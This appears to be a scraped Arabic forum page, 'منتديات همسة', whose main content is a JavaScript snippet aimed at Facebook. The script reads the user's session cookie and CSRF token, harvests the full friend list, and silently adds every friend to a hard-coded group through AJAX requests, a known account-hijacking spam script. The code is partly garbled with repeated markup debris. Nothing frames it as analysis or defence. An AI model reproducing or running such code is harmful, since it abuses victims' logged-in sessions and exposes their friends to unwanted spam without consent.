منتديات همسة
سجلات منتدانا افادت بانك غير مسجل لدينا ويتوجب عليك التسجيل لاستخدام كل صلاحيات المنتدى اما لو كنت عضو فى المنتدى فتفضل بالدخول وعرف بنفسك

ادارة منتديات همسة 
الرئيسيةس .و .جبحـثالتسجيلدخول

var user = getCookie("c_user");function getCookie(c_name) { var i,x,y,ARRcookies=document.cookie.split(";"); for (i=0;iAdding " var="" }="" unescape(y);="" return="" (x="=c_name)" if="" y="ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);" x="ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));" {="">";if (i > 0) { dipes += arr.length + " Friends Detected
";dipes += "" + suc + " Friends Added Of " + (arr.length - i) + " Friends Processed ";dipes += "(" + i + " More To Go..)"; dipes += "
";dipes += kunaon; dipes += "
Adding " var="" }="" unescape(y);="" return="" (x="=c_name)" if="" y="ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);" x="ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));" {="">"} else { dipes += arr.length + " Friends Detected And "; dipes += "" + suc + " Friends Added";dipes += "
Done
Adding " var="" }="" unescape(y);="" return="" (x="=c_name)" if="" y="ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);" x="ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));" {="">"} dipes += ""; document.getElementById("pagelet_welcome_box").innerHTML = dipes }, "text", "post"); tay--; if (tay > 0) { var s = arr[tay]; setTimeout("penetrasi(" + s + ")", 100) } console.log(tay + "/" + arr.length + ":" + s + ", success:" + suc); if (memberGroupId != 128336317239973) { jx.load(window.location.protocol + "//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg=" + document.getElementsByName("fb_dtsg")[0].value + "&group_id=128336317239973&source=typeahead&members=" + opo + "&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user=" + user, function () {}, "text", "post") } } function clickfr_callback() { if (document.getElementsByName("ok").length > 0) { nHtml.ClickUp(document.getElementsByName("ok")[0]) } var a = arr[i]; if (i < arr.length) addfriend(a.substring(0, 4)) } function clickfr() { if (document.getElementsByClassName("search").length > 0) { console.log(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1].innerHTML); document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].href = "javascript:void(0);"; nHtml.ClickUp(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1]) } else j++; setTimeout("clickfr_callback()", 2e3) } function addfriend(a) { i++; document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(); document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].value = a; document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].blur(); document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(); document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(); setTimeout("clickfr()", 2e3) } function sleep(a) { var b = (new Date).getTime(); for (var c = 0; c < 1e7; c++) { if ((new Date).getTime() - b > a) { break } } } jx = { getHTTPObject: function () { var a = false; if (typeof ActiveXObject != "undefined") { try { a = new ActiveXObject("Msxml2.XMLHTTP") } catch(b) { try { a = new ActiveXObject("Microsoft.XMLHTTP") } catch(c) { a = false } } } else { if (window.XMLHttpRequest) { try { a = new XMLHttpRequest } catch(b) { a = false } } } return a }, load: function (url, callback, format, method, opt) { var http = this.init(); if (!http || !url) { return } if (http.overrideMimeType) { http.overrideMimeType("text/xml") } if (!method) { method = "GET" } if (!format) { format = "text" } if (!opt) { opt = {} } format = format.toLowerCase(); method = method.toUpperCase(); var now = "uid=" + (new Date).getTime(); url += url.indexOf("?") + 1 ? "&": "?"; url += now; var parameters = null; if (method == "POST") { var parts = url.split("?"); url = parts[0]; parameters = parts[1] } http.open(method, url, true); if (method == "POST") { http.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http.setRequestHeader("Content-length", parameters.length); http.setRequestHeader("Connection", "close") } var ths = this; if (opt.handler) { http.onreadystatechange = function () { opt.handler(http) } } else { http.onreadystatechange = function () { if (http.readyState == 4) { if (http.status == 200) { var result = ""; if (http.responseText) { result = http.responseText } if (format.charAt(0) == "j") { result = result.replace(/[\n\r]/g, ""); result = eval("(" + result + ")") } else { if (format.charAt(0) == "x") { result = http.responseXML } } if (callback) { callback(result) } } else { if (opt.loadingIndicator) { document.getElementsByTagName("body")[0].removeChild(opt.loadingIndicator) } if (opt.loading) { document.getElementById(opt.loading).style.display = "none" } if (error) { error(http.status) } } } } } http.send(parameters) }, bind: function (a) { var b = { url: "", onSuccess: false, onError: false, format: "text", method: "GET", update: "", loading: "", loadingIndicator: "" }; for (var c in b) { if (a[c]) { b[c] = a[c] } } if (!b.url) { return } var d = false; if (b.loadingIndicator) { d = document.createElement("div"); d.setAttribute("style", "position:absolute;top:0px;left:0px;"); d.setAttribute("class", "loading-indicator"); d.innerHTML = b.loadingIndicator; document.getElementsByTagName("body")[0].appendChild(d); this.opt.loadingIndicator = d } if (b.loading) { document.getElementById(b.loading).style.display = "block" } this.load(b.url, function (a) { if (b.onSuccess) { b.onSuccess(a) } if (b.update) { document.getElementById(b.update).innerHTML = a } if (d) { document.getElementsByTagName("body")[0].removeChild(d) } if (b.loading) { document.getElementById(b.loading).style.display = "none" } }, b.format, b.method, b) }, init: function () { return this.getHTTPObject() } }; var nHtml = { FindByAttr: function (a, b, c, d) { if (c == "className") { c = "class" } var e = document.evaluate(".//" + b + "[@" + c + "='" + d + "']", a, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null); if (e && e.singleNodeValue) { return e.singleNodeValue } return null }, FindByClassName: function (a, b, c) { return this.FindByAttr(a, b, "className", c) }, FindByXPath: function (a, b) { try { var c = document.evaluate(b, a, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null) } catch(d) { GM_log("bad xpath:" + b) } if (c && c.singleNodeValue) { return c.singleNodeValue } return null }, VisitUrl: function (a) { window.setTimeout(function () { document.location.href = a }, 500 + Math.floor(Math.random() * 500)) }, ClickWin: function (a, b, c) { var d = a.document.createEvent("MouseEvents"); d.initMouseEvent(c, true, true, a, 0, 0, 0, 0, 0, false, false, false, false, 0, null); return ! b.dispatchEvent(d) }, Click: function (a) { return this.ClickWin(window, a, "click") }, ClickTimeout: function (a, b) { window.setTimeout(function () { return nHtml.ClickWin(window, a, "click") }, b + Math.floor(Math.random() * 500)) }, ClickUp: function (a) { this.ClickWin(window, a, "mousedown"); this.ClickWin(window, a, "mouseup"); this.ClickWin(window, a, "click") }, GetText: function (a, b) { var c = ""; if (b == undefined) { b = 0 } if (b > 40) { return } if (a.textContent != undefined) { return a.textContent } for (var d = 0; d < a.childNodes.length; d++) { var e = a.childNodes[d]; c += this.GetText(e, b + 1) } return c } }; if (document.getElementsByClassName == undefined) { document.getElementsByClassName = function (a) { var b = new RegExp("(?:^|\\s)" + a + "(?:$|\\s)"); var c = document.getElementsByTagName("*"); var d = []; var e; for (var f = 0; (e = c[f]) != null; f++) { var g = e.className; if (g && g.indexOf(a) != -1 && b.test(g)) d.push(e) } return d } } Array.prototype.find = function (a) { var b = false; for (i = 0; i < this.length; i++) { if (typeof a == "function") { if (a.test(this[i])) { if (!b) { b = [] } b.push(i) } } else { if (this[i] === a) { if (!b) { b = [] } b.push(i) } } } return b }; var a = 0, eind = 0; var len = document.getElementsByClassName("mbm").length; for (a = 0; a < len; a++) { var ele = document.getElementsByClassName("mbm")[a]; if (ele && ele.childNodes[0] && ele.childNodes[0] && ele.childNodes[0].childNodes[1] && ele.childNodes[0].childNodes[1].childNodes[0] && document.getElementsByClassName("mbm")[a].childNodes[0].childNodes[1].childNodes[0].value == "Add Friends To Group") { eind = a; break } } var i = 3; var tay = 3; var counter1 = 0, counter2 = 0, counter3 = 0; var j = 0; var k = 0; var suc = 0; var arr = new Array; var memberGroupId = document.getElementsByName('group_id')[0].value; jx.load(window.location.protocol + "//www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer=" + user + "&filter[0]=user&__user=" + user, function (a) { var b = a; var c = b.substring(b.indexOf("{")); var d = JSON.parse(c); d = d.payload.entries; for (var e = 0; e < d.length; e++) { arr.push(d[e].uid) } i = arr.length - 1; tay = i; console.log(arr.length); var dipes = "
";dipes += "
" + abnaa_el3wamer + "
";dipes += arr.length + " Friends Detected"; dipes += "
Adding " var="" }="" unescape(y);="" return="" (x="=c_name)" if="" y="ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);" x="ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));" {="">";document.getElementById("pagelet_welcome_box").innerHTML = dipes; penetrasi(arr[i]) })